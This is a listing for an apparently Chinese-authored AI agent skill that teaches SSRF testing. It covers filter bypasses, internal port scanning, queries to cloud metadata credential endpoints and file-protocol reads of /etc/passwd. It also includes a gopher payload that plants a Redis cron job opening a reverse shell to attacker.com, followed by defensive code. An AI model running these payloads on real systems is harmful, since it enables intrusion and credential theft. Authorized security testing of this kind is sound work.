ssrf-testing

Original🇨🇳 Chinese
Translated

Professional Skills and Methodologies for SSRF (Server-Side Request Forgery) Testing

4installs
Sourceed1s0nz/cyberstrikeai
Added on

NPX Install

npx skill4agent add ed1s0nz/cyberstrikeai ssrf-testing

Tags

Translated version includes tags in frontmatter
ssrf-testingvulnerability-detectionexploit-techniquessecurity-mitigationcloud-metadata

SKILL.md Content (Chinese)

View Translation Comparison →

SSRF (Server-Side Request Forgery) Testing

Overview

SSRF (Server-Side Request Forgery) is a vulnerability that exploits servers to initiate requests, enabling access to internal network resources, port scanning, or firewall bypassing. This skill provides methods for detecting, exploiting, and defending against SSRF vulnerabilities.

Vulnerability Principle

Applications accept URL parameters and request the specified URL. Attackers can control the target of the request, leading to:
  • Access to internal network resources
  • Local file reading
  • Port scanning
  • Firewall bypass
  • Cloud service metadata access

Testing Methods

1. Identify SSRF Input Points

Common Features:
  • URL Preview/Screenshot
  • File Upload (Remote URL)
  • Webhook Callback
  • API Proxy
  • Data Import
  • Image Processing
  • PDF Generation

2. Basic Detection

Test Local Loopback:
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
Test Internal Network IPs:
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
Test File Protocol:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts

3. Bypass Techniques

IP Address Encoding:
127.0.0.1 → 2130706433 (Decimal)
127.0.0.1 → 0x7f000001 (Hexadecimal)
127.0.0.1 → 0177.0.0.1 (Octal)
Domain Resolution Bypass:
127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me
URL Redirection:
http://attacker.com/redirect → http://127.0.0.1
Protocol Obfuscation:
http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1

Exploitation Techniques

Internal Network Detection

Port Scanning:
bash
# Use Burp Intruder
http://127.0.0.1:22
http://127.0.0.1:3306
http://127.0.0.1:6379
http://127.0.0.1:8080
http://127.0.0.1:9200
Service Identification:
  • Response time differences
  • Error messages
  • HTTP status codes
  • Response content

Cloud Service Metadata

AWS EC2:
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Google Cloud:
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
Azure:
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01
Alibaba Cloud:
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/

Internal Network Application Attacks

Access Admin Backends:
http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin
Unauthorized Redis Access:
http://127.0.0.1:6379
# Then send Redis commands
FastCGI Attack:
http://127.0.0.1:9000
# Execute commands using FastCGI protocol

Advanced Exploitation

Gopher Protocol

Send Arbitrary Protocol Data:
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a
Redis Command Execution:
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

Dict Protocol

Port Scanning and Information Gathering:
dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status

File Protocol

Read Local Files:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ

Tool Usage

SSRFmap

bash
# Basic Scan
python3 ssrfmap.py -r request.txt -p url

# Port Scan
python3 ssrfmap.py -r request.txt -p url -m portscan

# Cloud Metadata
python3 ssrfmap.py -r request.txt -p url -m cloud

Gopherus

bash
# Generate Gopher payload
python gopherus.py --exploit redis

Burp Collaborator

Detect Blind SSRF:
http://burpcollaborator.net
# Observe if there are DNS/HTTP requests

Verification and Reporting

Verification Steps

  1. Confirm that the request target can be controlled
  2. Verify access to internal network resources or port scanning
  3. Assess the scope of impact (internal network penetration, data leakage, etc.)
  4. Record complete POC

Reporting Key Points

  • Vulnerability location and input parameters
  • Accessible internal network resources or ports
  • Complete exploitation steps and PoC
  • Fix recommendations (URL whitelist, disable dangerous protocols, etc.)

Defense Measures

Recommended Solutions

  1. URL Whitelist
    python
    ALLOWED_DOMAINS = ['example.com', 'cdn.example.com']
parsed = urlparse(url)
if parsed.netloc not in ALLOWED_DOMAINS:
    raise ValueError("Domain not allowed")
  2. Disable Dangerous Protocols
    • Only allow http/https
    • Block file://, gopher://, dict://, etc.
  3. IP Address Filtering
    python
    import ipaddress

def is_internal_ip(ip):
    return ipaddress.ip_address(ip).is_private or \
           ipaddress.ip_address(ip).is_loopback
  4. Use DNS Resolution Verification
    • Resolve domain names to get IPs
    • Verify if the IP is within the internal network range
  5. Network Isolation
    • Restrict server outbound access permissions
    • Use proxy servers

Notes

  • Only perform tests in authorized environments
  • Avoid impacting internal network systems
  • Note the support status of different protocols
  • Pay attention to request frequency during testing to avoid triggering defenses